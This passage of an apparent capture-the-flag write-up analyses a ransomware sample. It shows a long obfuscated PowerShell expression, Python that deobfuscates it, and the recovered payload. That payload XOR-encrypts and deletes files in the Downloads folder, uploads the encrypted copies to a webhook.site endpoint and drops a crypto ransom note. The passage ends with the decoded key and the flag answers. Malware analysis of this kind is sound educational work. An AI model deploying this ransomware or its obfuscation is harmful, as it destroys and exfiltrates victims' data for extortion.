13 - 88 + 86 + 92],m[29 + 41 + 88 - 35 + 35 - 146],l[77 - 54 - 81 + 12 - 79 + 165],j[27 + 37 - 71 + 26 + 93 - 16],i[- 19 - 60 + 50 - 85 - 50 + 244],q[- 63 - 66 - 19 - 56 - 22 + 266],b[92 + 47 + 97 - 19 - 59 - 149],k[94 + 23 - 82 - 11 + 26 + 8],i[72 + 87 + 22 - 15 - 88 - 42],k[60 + 79 - 24 + 48 - 60 - 52],c[63 + 66 - 62 + 43 - 38 + 7],l[- 74 - 39 + 97 + 40 - 69 + 63],j[- 67 + 42 + 46 + 21 - 60 + 46],r[- 53 + 76 - 41 - 38 + 35 + 31],a[- 22 - 94 - 83 + 38 - 57 + 292],a[57 - 76 + 49 + 35 - 76 + 11],g[- 77 + 68 + 27 + 46 - 58 - 3],d[- 27 - 86 + 43 + 17 + 87 + 31],u[41 - 23 + 94 + 10 - 97 - 18],d[74 - 46 - 82 - 59 - 14 + 192],u[85 + 89 + 95 + 24 - 32 - 254],d[77 - 43 + 36 + 60 + 68 - 133],a[62 - 30 + 59 - 52 - 54 + 30],d[- 43 - 23 - 80 + 17 + 83 + 111],h[75 - 92 + 92 - 49 - 19 + 54],g[83 - 94 + 14 - 99 - 61 + 160],u[52 + 73 + 29 - 90 - 72 + 15],c[- 63 - 33 - 65 + 57 - 97 + 299],f[- 41 + 49 + 89 - 55 - 31 + 5],o[- 25 + 74 - 62 - 11 - 12 + 40],j[- 93 - 40 + 55 - 70 - 93 + 302],j[- 47 + 42 - 57 + 85 + 93 - 84],p[31 - 17 - 42 + 32 + 33 + 2],r[- 91 + 58 + 44 - 16 + 61 - 28],h[36 - 95 + 95 + 79 - 67 - 6],u[- 33 - 13 - 67 - 27 - 64 + 240],l[- 56 - 65 + 41 - 44 + 93 + 41],h[17 - 62 - 94 + 63 + 10 + 97],f[88 - 14 + 38 - 92 + 14],e[- 93 + 19 + 44 - 61 - 38 + 144],t[88 + 41 - 40 + 57 - 45 - 6],t[93 - 66 + 50 + 94 - 84 - 51],o[- 19 - 75 + 96 - 70 - 61 + 196],g[- 13 - 73 - 71 + 52 - 80 + 204],n[43 - 93 + 96 - 39 - 53 + 65],e[15 - 97 - 69 - 43 - 76 + 306],m[- 36 - 96 - 60 - 52 + 40 + 264],h[- 36 - 43 - 73 + 83 - 38 + 149],m[91 - 71 + 28 - 69 - 90 + 126],r[- 37 - 98 - 54 + 80 - 43 + 162],n[- 67 - 52 + 59 + 30 + 34 + 62],h[59 - 15 - 68 - 50 - 41 + 183],o[- 43 + 91 + 20 + 50 - 30 - 2],h[- 29 - 14 - 33 + 27 + 35 + 112],r[- 94 + 77 - 93 + 25 - 85 + 213],k[93 + 45 + 91 + 37 - 24 - 184],g[21 - 34 - 14 - 97 + 62 + 102],k[24 + 75 - 32 - 93 + 24 + 58],l[88 - 90 + 36 + 27 + 19 + 5],p[- 61 - 19 + 37 - 59 + 36 + 137],h[60 + 54 + 86 + 36 - 72 - 109],h[26 + 57 - 93 - 94 + 37 + 95],i[58 - 29 - 57 - 72 + 71 + 109],e[28 - 30 + 25 - 33 + 18 + 79],u[18 - 83 - 48 - 42 - 64 + 238],n[- 51 - 57 + 46 - 41 - 91 + 206],r[- 90 + 77 - 18 + 68 + 95 - 104],c[- 17 + 90 + 90 - 97 + 81 - 67],l[- 49 - 46 - 86 - 69 - 76 + 336],f[87 + 88 + 43 - 52 - 66 - 96],g[- 22 - 89 + 85 + 67 - 81 + 43],u[30 - 27 + 52 - 45 + 39 - 46],q[75 - 31 + 52 + 91 + 85 - 229],g[- 23 - 87 - 16 - 61 - 46 + 252],k[- 61 - 68 - 39 + 42 + 12 + 145],c[- 41 + 81 + 52 + 81 + 20 - 178],c[65 + 68 + 80 - 27 + 38 - 179],u[98 + 25 - 34 - 85 - 32 + 103],b[- 92 - 32 + 95 - 33 - 70 + 181],o[63 + 94 + 29 - 75 + 40 - 60],o[- 90 - 29 + 44 - 62 + 60 + 119],h[74 - 86 - 96 + 26 - 84 + 233],h[59 + 26 - 15 + 73 + 88 - 197],e[- 72 + 82 - 94 - 83 - 89 + 326],r[14 - 72 + 56 - 62 + 64 + 19],p[- 80 - 23 + 25 - 42 + 14 + 125],q[- 56 + 15 - 40 + 88 + 60 - 27],l[47 + 29 - 58 - 22 - 34 + 79],a[- 94 + 55 + 15 + 18 - 79 + 85],t[17 + 87 - 98 + 19 + 72 - 73],e[- 26 + 27 - 10 - 13 - 89 + 121],p[66 + 26 - 30 + 90 + 18 - 161],l[- 47 + 21 - 37 + 29 - 19 + 63],o[54 - 83 - 95 + 44 + 28 + 84],d[58 - 60 + 59 - 93 + 80 + 21],d[89 + 31 + 68 - 91 + 11 - 43],e[- 93 - 65 + 74 + 58 + 34 + 2],p[- 22 - 45 - 55 + 15 - 90 + 231],r[- 80 - 75 - 11 - 86 - 30 + 362],l[73 - 10 + 84 + 36 - 45 - 128],b[- 30 - 79 + 71 - 20 + 97 + 21],e[67 - 91 - 61 + 66 + 68 - 39],m[- 77 + 62 - 68 + 11 + 23 + 111],k[- 56 - 75 - 26 + 68 + 27 + 120],f[- 71 + 44 + 40 - 96 - 85 + 202],f[56 + 39 + 33 - 65 - 55 + 26],t[- 16 + 82 + 94 - 14 + 82 - 204],g[- 58 + 86 + 82 + 60 - 67 - 63],e[- 23 + 70 - 87 + 41 - 55 + 141],r[- 66 + 91 + 21 + 96 - 60 - 18],h[70 - 18 + 85 - 89 - 54 + 99],q[72 + 37 + 18 - 97 + 68 + 1],r[37 + 57 + 13 + 73 + 62 - 173],q[88 + 88 - 38 - 68 + 96 - 129],e[- 81 + 62 - 46 - 13 - 20 + 164],g[15 + 85 - 35 + 52 + 76 - 190],o[- 96 - 58 + 23 - 25 - 71 + 238],m[- 46 - 70 + 44 + 78 - 49 + 105],f[21 + 82 - 29 - 11 + 10 + 17],n[85 - 87 + 81 + 54 + 72 - 204],o[77 + 18 + 79 - 21 - 48 - 62],k[- 20 - 17 - 73 + 53 - 99 + 254],i[- 67 - 29 - 56 - 43 + 64 + 211],p[72 - 32 - 59 - 30 + 41 + 67],m[- 13 + 27 - 47 - 21 + 44 + 87],q[88 - 66 + 29 + 89 + 30 - 126],o[- 31 + 39 - 21 + 72 + 77 - 92],a[- 14 - 23 - 67 + 21 - 47 + 203],n[29 - 27 + 89 - 51 - 43 + 89],q[95 - 72 - 19 + 53 + 80 - 102],o[- 85 - 37 + 13 + 33 - 18 + 126],k[- 46 - 51 + 23 + 60 - 75 + 147],k[30 - 88 - 20 - 69 - 47 + 252],k[- 58 - 85 + 14 + 77 + 30 + 80],a[95 + 42 + 51 - 78 + 78 - 173],e[- 14 + 18 + 82 - 47 - 81 + 52],m[74 + 96 - 17 - 96 + 96 - 91],m[- 30 + 87 + 41 - 79 + 58 - 15],t[72 - 11 + 73 - 37 - 48 - 37],q[31 + 17 + 14 + 59 - 24 - 26],k[21 - 46 + 23 - 78 + 60 + 51],g[22 - 15 + 93 + 90 + 62 - 251],o[- 90 + 90 + 66 - 44 - 29 + 74],o[92 + 42 - 76 + 74 - 43 - 85],n[- 87 + 51 - 61 + 15 - 85 + 190],r[- 90 - 23 - 15 + 62 + 75 + 23],r[- 80 + 84 + 14 + 72 - 10 - 56],l[71 + 98 - 51 + 54 - 86 - 36],m[20 + 17 + 66 - 49 + 51 - 28],q[- 92 + 29 + 77 - 90 - 99 + 191],k[- 57 - 75 + 47 + 14 + 23 + 99],r[- 24 + 42 - 65 - 43 - 37 + 186],b[- 53 + 62 - 29 + 17 + 65 - 13],l[86 - 42 + 44 + 44 - 26 - 65],c[82 + 46 - 56 - 23 + 87 - 123],c[- 68 - 67 + 65 + 39 - 88 + 132],f[85 - 84 + 42 - 59 - 38 + 71],a[58 + 90 + 78 - 92 - 56 - 10],c[84 - 79 - 47 - 68 + 20 + 170],e[- 54 + 20 + 73 - 35 - 70 + 143],n[- 39 - 83 + 15 + 75 - 58 + 118],n[- 87 - 70 - 13 - 70 - 68 + 369],l[58 + 62 - 77 + 87 + 26 - 120],b[- 31 + 80 + 78 - 52 + 14 - 46],r[24 - 89 + 32 - 93 + 17 + 131],i[57 + 87 - 63 - 50 - 80 + 128],k[91 + 83 - 69 - 52 + 54 - 37],i[- 14 - 48 - 87 + 39 - 78 + 263],r[76 - 31 + 11 + 36 - 37 - 9],t[- 45 - 45 - 83 - 19 - 11 + 300],d[84 - 25 - 92 + 56 - 41 + 27],r[29 - 21 - 57 - 44 + 71 + 112],j[49 - 63 + 40 - 92 - 95 + 222],g[- 94 + 93 - 93 - 43 - 83 + 255],q[29 + 93 - 32 - 43 + 50 + 2],h[42 - 99 - 86 - 54 - 92 + 360],c[- 21 + 20 - 86 - 47 - 50 + 203],p[54 + 93 + 13 - 14 - 58 - 29],j[39 - 44 + 49 + 25 + 60 - 31],d[- 35 - 58 - 48 - 64 + 74 + 196],n[- 68 - 12 + 55 - 87 + 89 + 24],k[10 + 37 - 89 - 87 + 68 + 105],e[- 40 + 76 - 25 - 70 - 73 + 202],q[19 + 44 + 41 + 95 - 64 - 89],u[- 93 - 23 - 42 + 21 - 16 + 222],i[95 - 93 + 42 - 44 + 20 + 51],r[- 24 - 11 - 59 - 81 + 11 + 174],u[23 + 46 + 80 + 92 + 85 - 319],n[69 - 89 - 64 + 17 - 26 + 114],o[75 + 66 - 21 - 98 + 97 - 87],h[42 + 97 + 23 + 36 - 93 - 44],b[- 17 - 54 + 43 + 90 + 57 - 59],t[24 - 91 - 23 + 56 + 91 - 33],f[74 + 80 + 52 - 28 + 64 - 208],g[- 58 + 67 - 12 - 17 - 57 + 133],u[- 22 + 40 + 18 - 67 + 77 + 31],h[43 - 27 - 91 - 86 + 59 + 147],i[33 - 71 - 15 - 74 + 47 + 178],a[16 - 95 + 59 + 87 - 32 - 4],a[- 78 - 87 - 82 + 92 - 67 + 242],n[36 + 82 - 43 - 43 - 55 + 89],j[90 + 10 - 22 + 25 - 17 - 14],d[- 92 + 30 + 34 - 41 - 18 + 157],k[- 13 + 27 - 97 - 65 + 70 + 122],n[66 - 21 + 78 + 28 + 12 - 140],f[- 60 + 47 + 60 - 63 + 95 - 45],i[84 - 32 + 26 - 59 + 69 - 52],c[- 13 - 99 - 31 - 74 - 52 + 336],a[68 + 19 + 62 - 58 - 18 - 24],h[37 - 64 - 66 - 49 + 48 + 172],m[32 + 83 + 28 + 63 - 73 - 54],d[- 41 + 11 + 57 + 82 + 36 - 80],e[48 - 28 + 13 - 80 - 96 + 147],u[- 36 + 29 + 70 - 59 - 64 + 133],m[98 + 89 + 94 - 75 + 26 - 162],r[- 87 - 42 + 51 + 95 + 47 - 21],f[- 83 + 88 - 98 - 36 - 16 + 154],r[- 65 + 66 - 74 - 92 + 13 + 242],g[47 - 21 - 66 + 90 + 97 - 66],b[63 + 71 - 66 - 30 + 80 - 58],i[- 63 - 81 - 12 + 70 - 26 + 178],o[- 66 + 95 - 61 - 45 + 61 + 48],n[- 20 + 67 + 98 - 78 - 28 - 18],u[44 + 76 + 59 - 86 + 16 - 102],e[- 86 + 68 + 41 + 56 - 31 - 38],a[58 - 22 + 98 - 94 - 76 + 51],e[- 11 - 84 - 47 + 93 - 55 + 114],d[59 - 24 + 79 + 22 - 65 - 61],o[- 66 - 87 + 67 - 26 + 10 + 146],d[- 17 + 52 + 93 + 12 - 74 - 46],l[- 48 - 32 - 91 - 94 + 19 + 276],r[43 + 59 - 29 + 56 - 50],f[20 - 68 - 54 - 59 + 50 + 209],u[- 66 + 82 - 78 + 50 - 67 + 122],b[- 18 + 69 + 27 - 90 + 59 - 42],h[99 + 27 - 37 + 20 + 26 - 101],c[- 82 - 82 - 71 + 46 + 15 + 239],a[98 - 23 - 45 - 22 - 31 + 121],d[91 - 38 - 77 + 39 + 53 - 20],q[26 - 78 + 36 + 11 + 12 + 37],p[- 67 - 62 - 96 + 63 + 62 + 119],b[16 - 95 - 65 - 55 + 29 + 218],h[46 + 60 - 41 - 62 - 30 + 125],r[- 41 - 25 - 14 + 55 - 92 + 120],f[10 - 44 - 45 + 79 - 81 + 115],c[91 - 19 - 20 - 80 - 13 + 109],p[64 + 47 - 18 - 69 + 28],b[19 - 39 - 31 - 87 - 34 + 187],b[82 - 68 - 90 + 61 - 56 + 77],c[35 - 68 + 69 - 94 + 17 + 139],a[77 + 13 + 58 - 85 + 31 - 17],a[62 - 58 - 95 + 43 + 83 + 51],a[52 + 36 + 86 + 29 - 37 - 146],d[- 44 + 31 + 38 + 39 + 64 - 94],q[- 24 - 16 + 79 - 14 + 19 - 4],i[81 - 27 + 31 + 24 + 43 - 54],c[- 39 - 55 + 26 - 66 - 63 + 273],k[46 - 18 - 27 - 25 + 98 - 18],t[64 - 75 + 20 - 48 - 54 + 117],t[79 - 91 - 18 - 64 + 65 + 119],l[- 45 - 93 - 38 + 33 - 82 + 259],n[- 71 - 90 + 45 + 42 - 46 + 148],m[- 47 + 20 - 55 + 85 - 73 + 145],r[85 + 60 + 22 - 90 - 16 + 15],j[- 90 + 24 - 67 + 46 - 21 + 151],m[- 96 + 96 + 73 - 55 + 23 - 8],d[- 36 - 13 + 13 + 28 + 87 - 14],r[- 69 - 86 + 43 + 89 - 39 + 77],l[- 16 - 15 + 64 - 25 - 96 + 118],u[79 + 17 + 26 - 57 - 75 + 29],u[- 94 + 10 - 57 + 89 - 53 + 180],b[40 - 69 + 63 - 94 + 21 + 99],n[63 - 66 + 18 + 41 + 25 - 15],h[77 - 46 - 35 + 27 + 99 - 31],p[49 - 28 + 34 + 62 - 56 - 46],h[36 - 75 + 99 - 25 - 91 + 63],g[- 34 + 55 + 93 - 25 + 95 - 171],p[74 + 64 + 85 + 97 + 76 - 350],u[- 92 + 74 + 96 + 37 + 18 - 56],e[77 + 66 + 80 - 57 - 59 - 97],f[12 - 66 - 91 + 33 + 95 + 33],g[22 + 48 + 80 + 38 + 68 - 237],b[62 - 38 + 53 + 29 + 99 - 110],b[- 15 + 32 - 94 - 99 - 20 + 249],h[- 83 - 58 + 39 + 23 - 36 + 210],j[- 17 + 66 + 68 - 18 + 91 - 121],i[65 + 75 - 70 + 37 + 40 - 67],d[- 94 - 14 - 33 - 32 - 73 + 333],j[44 + 28 + 84 + 75 + 77 - 226],p[- 52 - 10 + 37 - 13 + 89 - 41],k[91 - 65 - 91 + 69 - 13 + 72],c[- 70 + 38 + 40 + 83 + 54 - 69],a[- 51 + 27 + 18 + 76 - 34 + 35],u[35 - 63 - 87 - 70 + 42 + 218],k[- 22 + 77 + 67 - 58 + 86 - 106],p[- 29 - 81 - 60 + 83 - 30 + 132],j[31 + 56 + 12 + 66 - 70 - 45],f[- 49 + 58 - 87 + 11 - 37 + 196],o[- 24 - 36 + 54 + 12 - 70 + 130],n[52 + 40 + 82 + 21 - 19 - 139],f[- 54 + 20 - 70 - 11 - 22 + 235],h[- 49 + 69 + 42 - 43 - 80 + 122],m[68 - 86 + 23 + 96 - 69 + 7],k[- 41 - 69 - 63 - 68 + 52 + 287],c[35 + 23 - 33 + 72 - 78 + 48],i[71 - 66 - 86 + 62 - 82 + 129],q[36 + 89 + 39 - 73 - 37],g[15 + 62 + 85 - 36 + 99 - 212],j[- 43 - 27 + 52 - 59 - 60 + 169],r[- 50 + 86 - 95 + 95 + 37 - 4],b[50 - 46 + 54 - 21 - 91 + 115],e[65 - 66 + 97 + 10 + 63 - 146],l[53 - 63 - 67 + 58 + 63 - 14],c[67 - 26 + 31 + 69 - 89 - 43],q[38 + 96 + 41 + 66 - 54 - 94],b[- 49 + 31 - 41 - 44 - 10 + 137],u[- 85 + 37 + 36 + 15 - 36 + 80],a[- 15 - 23 - 24 + 17 - 39 + 182],h[53 + 93 + 83 + 13 + 83 - 291],i[- 41 - 50 - 81 + 40 - 72 + 284],e[61 - 50 + 24 + 30 - 84 + 23],q[- 16 - 18 - 77 + 60 - 88 + 144],o[- 52 - 25 + 35 + 13 + 54 + 42],l[- 14 + 62 - 32 + 83 - 83 + 32],k[- 60 - 76 + 79 + 64 - 96 + 133],n[- 87 - 69 + 49 + 46 - 59 + 203],d[23 - 14 - 84 + 97 - 30 + 103],n[- 44 + 40 - 88 + 36 - 11 + 153],a[46 - 41 - 33 + 50 - 69 + 47],u[- 23 - 27 - 76 + 42 - 70 + 161],j[- 56 + 28 - 96 - 83 + 69 + 220],d[92 + 45 - 80 + 69 + 42 - 103],e[- 61 + 45 - 16 - 10 + 83 - 31],r[- 32 - 66 - 16 - 62 - 36 + 311],h[- 57 + 92 - 73 + 75 - 25 + 49],k[- 38 - 32 + 60 + 83 - 57 + 24],l[13 + 96 - 99 + 88 - 75 + 68],e[- 83 + 92 - 68 - 45 - 70 + 251],l[46 - 13 - 99 + 64 - 19 + 64],p[91 - 33 - 52 + 56 - 13 + 10],p[- 95 - 35 + 13 + 80 + 17 + 29],t[64 - 64 + 64 - 16 + 39 - 43],a[79 + 73 + 69 + 23 + 10 - 254],p[21 - 77 + 73 + 39 + 10 - 57],i[- 54 + 45 + 26 + 67 + 12 - 30],t[20 - 62 - 14 - 21 - 85 + 186],h[- 57 + 55 - 17 - 47 + 54 + 73],r[17 - 61 + 62 - 21 - 99 + 112],e[- 60 - 53 + 93 - 80 + 25 + 85],r[- 14 - 93 - 42 + 98 + 96 - 35],m[- 91 - 79 - 85 - 58 - 72 + 447],p[21 - 45 - 12 + 94 - 89 + 42],e[90 - 62 - 53 + 89 + 72 - 69],a[24 + 59 - 90 - 74 + 83 + 19],h[- 84 + 73 + 56 - 23 - 87 + 143],c[- 44 + 57 + 25 - 28 + 89 - 5],r[- 89 - 67 - 84 + 69 + 29 + 193],g[33 - 39 + 78 - 18 + 46 - 33],e[- 13 + 47 - 79 - 78 + 16 + 133],q[26 + 32 - 44 + 46 - 17 - 38],b[73 - 66 - 75 - 44 - 29 + 202],l[78 - 57 + 45 + 78 + 95 - 229],u[90 - 52 - 20 + 59 - 87 + 25],f[- 87 - 28 + 93 + 88 - 71 + 41],l[- 66 - 18 + 87 - 18 + 62 + 44],p[62 + 40 + 42 - 49 - 97 + 62],r[22 - 94 + 83 - 40 + 41 + 47],q[- 48 - 43 + 23 + 36 - 16 + 92],h[- 98 - 41 - 29 + 91 - 16 + 139],j[70 + 18 - 95 + 49 - 26 + 63],c[18 + 55 - 34 + 22 - 77 + 114],q[- 44 - 17 + 17 + 67 + 86 - 40],o[- 75 + 37 - 91 - 92 + 39 + 191],o[- 27 + 61 + 10 - 48 - 50 + 72],r[- 21 + 41 + 15 + 10 - 57 + 19],c[87 + 75 + 21 - 30 - 69 + 3],t[34 + 42 - 52 - 37 - 20 + 71],l[88 - 86 + 56 + 56 + 92 - 131],n[- 15 + 75 + 83 + 56 + 77 - 250],g[84 - 28 - 15 + 39 - 74 + 13],p[80 - 72 - 24 + 65 + 21 - 8],k[- 68 - 95 - 30 + 73 - 68 + 258],a[35 + 91 + 90 + 45 - 47 - 193],t[- 79 + 41 + 26 - 28 + 15 + 70],o[31 + 57 - 84 + 81 + 17 - 58],c[46 - 43 + 66 + 22 + 79 - 83],c[12 - 98 + 74 + 43 - 59 + 38],p[34 + 47 - 19 + 24 + 24 - 32],r[85 - 23 + 39 + 56 + 44 - 155],b[- 64 - 75 - 37 - 60 + 65 + 249],h[44 - 64 - 45 - 46 - 14 + 196],f[- 29 + 53 - 95 + 15 + 44 + 85],i[57 + 15 + 34 + 38 - 83 + 14],q[86 - 80 - 52 + 23 - 10 + 107],m[- 73 - 40 + 55 - 87 + 63 + 121],n[- 73 + 64 - 31 + 23 + 52 + 50],k[87 - 34 + 54 - 57 - 40 + 48],k[84 - 77 - 17 - 70 - 81 + 219],q[- 86 - 84 - 35 - 57 + 29 + 330],p[96 - 24 - 36 + 77 + 76 - 180],o[- 32 - 95 + 16 + 71 + 97 - 47],c[69 - 25 - 85 - 59 + 44 + 128],b[- 39 - 34 - 66 + 96 - 63 + 199],b[78 - 85 + 26 + 30 + 80 - 99],r[24 - 71 - 69 + 32 + 88 + 76],r[- 59 - 19 - 60 + 94 - 28 + 159],k[59 - 23 + 22 - 93 - 81 + 160],e[18 + 87 - 50 + 56 + 51 - 85],c[14 + 87 - 64 + 24 - 31 + 38],l[- 12 - 49 + 81 + 57 - 46 - 8],d[83 - 52 + 82 + 67 - 77 - 14],g[- 40 + 64 + 48 + 51 + 96 - 160],a[70 - 73 + 49 - 25 + 23 + 54],e[- 40 - 97 + 60 + 28 - 80 + 216],c[- 19 + 70 - 55 + 75 - 14 - 48],o[18 - 21 + 57 - 48 + 18 + 43],c[- 58 - 11 - 80 - 67 + 45 + 269],i[- 31 - 48 - 22 + 24 - 23 + 155],f[- 34 + 79 + 14 + 81 - 50 - 61],c[- 34 - 54 + 99 - 95 - 93 + 215],u[- 91 - 41 + 44 - 83 + 97 + 149],f[62 - 11 - 71 - 58 - 53 + 158],l[82 + 39 + 29 - 68 + 20 - 92],a[84 + 59 + 55 + 53 + 97 - 316],q[83 - 38 + 69 - 23 - 13 - 29],c[55 + 38 - 62 + 30 + 31 - 16],e[- 59 - 72 + 55 - 75 - 80 + 254],e[- 58 - 86 + 56 - 47 - 52 + 257],f[26 + 41 + 47 + 38 + 59 - 145],k[69 + 57 + 47 - 26 - 17 - 53],p[- 68 - 30 + 99 + 21 + 17 - 31],m[- 92 - 35 + 51 + 28 + 65 + 58],c[- 35 + 30 - 13 - 13 - 19 + 121],g[28 - 58 + 94 - 28 - 66 + 33],d[75 + 39 + 75 - 54 - 29 - 97],e[59 + 71 - 26 - 99 - 18 + 70],e[57 - 62 - 77 + 90 - 97 + 115],f[97 + 47 + 66 + 84 + 87 - 298],j[46 - 45 + 45 + 58 - 88 + 45],b[38 + 29 + 11 - 32 - 61 + 58],m[- 52 - 47 - 77 + 98 + 75 + 73],a[- 70 + 50 - 86 + 57 + 80 + 18],b[98 + 25 + 33 - 58 + 91 - 185],i[97 - 93 - 62 + 97 - 33 + 33],d[- 31 + 23 - 68 - 61 + 43 + 159],l[- 10 - 17 + 39 + 20 - 44 + 56],j[16 + 34 - 48 + 70 + 99 - 88],m[28 + 65 + 11 - 27 + 31 - 105],o[50 + 44 - 83 + 30 - 71 + 107],m[- 53 - 67 + 95 + 61 + 17 - 26],p[- 99 - 47 - 36 + 81 + 32 + 130],a[29 + 64 - 81 - 40 - 70 + 191],b[29 + 99 - 23 + 54 + 44 - 174],q[- 47 - 66 - 91 - 13 + 21 + 233],f[- 98 + 64 - 72 - 39 + 83 + 86],r[- 12 - 19 + 84 - 76 - 77 + 185],b[- 28 + 94 - 53 - 23 + 12 + 77],n[46 - 12 - 91 - 60 + 94 + 58],i[35 + 80 - 91 - 23 + 88 - 23],m[- 17 - 82 + 36 + 84 - 90 + 90],q[- 87 + 30 + 97 - 49 + 87 - 49],u[- 74 + 81 + 27 - 39 - 74 + 116],l[- 33 + 41 - 42 - 52 + 45 + 77],h[- 24 - 65 - 46 + 12 + 34 + 126],b[23 + 62 - 18 + 29 - 65 + 18],g[85 + 38 - 57 - 42 - 20 - 1],t[- 17 - 67 - 13 - 47 + 11 + 207],i[- 95 + 85 - 52 - 61 - 75 + 266],g[41 - 37 - 58 + 15 - 13 + 71],m[- 65 - 21 + 68 + 20 - 53 + 115],f[78 + 16 - 15 + 19 - 69 + 9],r[- 62 - 36 + 87 - 66 + 71 + 16],m[27 + 65 - 28 + 43 + 27 - 94],c[- 52 + 23 - 66 - 99 + 65 + 223],c[93 - 27 + 93 - 92 + 27 + 4],e[22 - 78 - 56 - 94 - 63 + 333],h[91 - 27 + 67 - 92 - 69 + 52],g[35 - 66 - 12 + 99 + 20 - 70],j[- 23 + 16 - 68 - 30 + 45 + 124],t[49 + 87 - 63 - 12 + 73 - 81],n[- 64 + 97 + 58 + 48 + 10 - 128],n[62 + 19 - 20 - 50 + 45 + 15],n[- 25 + 64 + 99 - 36 - 24 - 28],f[- 26 - 45 + 39 - 24 - 28 + 158],b[46 - 98 - 78 - 52 + 38 + 155],q[37 + 99 + 99 - 12 + 29 - 155],q[99 - 93 + 89 - 63 + 62 - 57],n[32 + 93 + 25 + 71 - 41 - 81],f[- 60 + 51 - 19 + 52 - 12 + 22],g[- 28 + 68 + 24 + 61 + 67 - 95],g[85 - 72 + 96 - 17 + 58 - 91],g[58 - 57 - 37 + 80 - 54 + 32],h[- 76 - 22 + 81 + 99 - 29 + 45],i[- 61 - 96 + 31 + 23 - 40 + 208],r[- 98 + 27 + 73 + 81 + 77 - 81],a[62 + 57 + 84 + 62 + 11 - 261],h[24 - 75 - 68 + 40 + 72 + 35],g[- 61 + 80 + 88 + 11 + 80 - 130],d[79 - 44 + 10 + 63 - 90 + 78],l[53 + 36 - 15 - 86 - 56 + 116],h[98 + 24 - 77 - 91 + 85 + 22],n[- 50 + 21 + 78 - 73 - 47 + 144],g[77 + 44 + 81 - 10 + 64 - 239],n[- 24 + 18 + 76 - 24 - 64 + 39],i[- 24 - 56 + 84 + 54 - 76 + 75],u[47 - 59 + 51 + 50 - 99 + 34],q[69 + 89 + 11 + 47 - 69 - 141],n[81 + 11 + 92 - 41 + 90 - 205],i[- 33 + 73 - 87 + 68 + 14 - 18],n[- 54 - 30 - 97 + 11 - 24 + 238],t[63 + 23 + 91 - 10 + 45 - 202],o[- 35 + 57 - 81 + 67 + 11 + 9],t[82 - 71 - 26 - 54 + 33 + 94],u[- 93 + 67 - 54 + 60 - 27 + 57],r[42 + 45 + 16 + 11 - 43 - 21],f[- 34 + 56 - 46 + 22 - 83 + 96],a[68 + 54 + 53 + 88 + 46 - 306],b[- 65 + 39 - 24 + 66 + 88 - 16],u[- 71 + 49 + 23 + 63 + 46 - 37],u[- 36 + 78 + 59 + 63 - 80 - 34],i[- 13 - 50 - 33 - 21 + 57 + 125],p[16 - 75 + 98 + 51 - 88 + 38],j[47 - 84 - 65 - 32 - 66 + 205],p[47 + 65 - 63 - 27 - 47 + 104],j[94 - 49 - 87 + 35 + 33 + 40],c[- 14 - 37 - 12 + 47 - 93 + 133],f[97 + 91 - 88 + 60 + 67 - 171],r[79 + 52 - 94 + 94 - 83 - 28],n[- 56 + 82 + 10 + 46 + 57 - 137],b[- 92 - 46 - 39 + 92 - 90 + 267],m[23 + 87 + 42 - 86 + 84 - 57],b[49 - 24 - 76 + 61 + 66 - 12],m[- 65 - 17 - 30 - 75 + 22 + 259],q[- 88 + 64 + 15 - 69 - 84 + 250],o[43 - 93 + 44 + 45 - 47 + 72],l[- 94 + 27 + 36 - 74 - 83 + 251],h[95 - 88 + 99 - 90 - 92 + 116],k[- 15 - 32 + 52 + 95 + 30 - 62],e[62 - 12 + 15 + 58 + 17 - 91],f[74 + 38 + 90 + 34 - 53 - 151],p[41 - 40 - 45 - 59 + 29 + 162],r[87 + 88 - 94 + 40 - 21 - 89],t[34 - 45 - 25 - 12 - 47 + 173],c[- 74 - 96 + 26 - 10 + 87 + 161],r[- 20 - 83 - 31 + 49 + 35 + 142],a[- 54 - 39 - 87 - 30 - 25 + 328],r[- 79 + 25 - 98 - 87 - 96 + 431],h[- 66 + 85 + 55 - 10 + 61 - 111],d[- 45 - 39 - 35 - 15 + 52 + 162],n[64 - 70 - 27 + 22 - 36 + 132]) -JOIN \"\")"""
pattern = re.compile(r'([a-z])\[([^\]]+)\]')
matches = pattern.findall(obfuscated_string)
reconstructed_chars = []
for match in matches:
array_name = match[0]
expression = match[1]
try:
index = eval(expression)
source_array = data_map.get(array_name)
if source_array:
char_code = source_array[index]
reconstructed_chars.append(chr(char_code))
else:
print(f"Warning: Array '{array_name}' not found.")
except Exception as e:
print(f"Could not process match: {match}. Error: {e}")
final_payload = "".join(reconstructed_chars)
return final_payload
if __name__ == "__main__":
reconstructed_string = deobfuscate_payload()
print(reconstructed_string)
Could not process match: ('q', '- 89 - 17 + 33 - 75 + 35 + 212'). Error: list index out of range
Could not process match: ('q', '72 + 37 + 18 - 97 + 68 + 1'). Error: list index out of range
Could not process match: ('q', '29 + 93 - 32 - 43 + 50 + 2'). Error: list index out of range
$key =P[Syste).Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("SUlUVFNTRUVDQ19DVEYyMDI1Q295eXl5eSEhISE="))
$keyBytes = [System.Text.Encoding]::UTF8.GetBytes($key)
$downloads = Join-Path $env:USERPROFILE "Downloads"
$webhookP= "https://webhook.site/5bdcd260-64f9-47d9-9fb5-1ef8146dc4v2"
$files = Get-ChildItem -pth $downloads -File -Recurse -ErrorAction SilentlyContinue
foreach ($file in $files) {
try {
P P $path = $file.FullName
$bytes =P[System.IO.File]::RepdAllBytes($path)
$enc = [byte[]~::new($bytes.Length)
for ($i = 0; $i -lt $bytes.Length; $i++) {
$enc[$i] = $bytes[$i] -bxor $keyBytes[$i % $keyBytes.Length]
}
$encath = "$path.enc"
[Hystem.IO.File]::WriteAllBytes($encath, $enc)
Remove-Item $path -Force
Invoke-RestMethod -Uri $webhook -Method Post -InFile $encPath -ContentType "applicationGoctet-stream"
} catch {
Write-Host "Failed: S($_.Exception.MessageA"
P }
}
Set-Content -Path (Join-Path $downloads "README.txt") -Value "Send me 10000 USDTPto unlock your PC (0xe28789577b1F8cfD964b2fD860C07758216CeAE1)"Although the result is not clean, we know that the key is encoded in base64 and we can decode it
So the key is IITTSSEECC_CTF2025Coyyyyy!!!!.
16. Decrypt the .txt file located in the Downloads folder and input its contents!
Base on decrypted payload, its likely a xor to encrypt the files. So we can decrypt that by xoring it with the key we already got.
If you able to decrypt the malware, submit this string into the bot :)
EzMalware_1337!!So the answer for last question is EzMalware_1337!!.
Last updated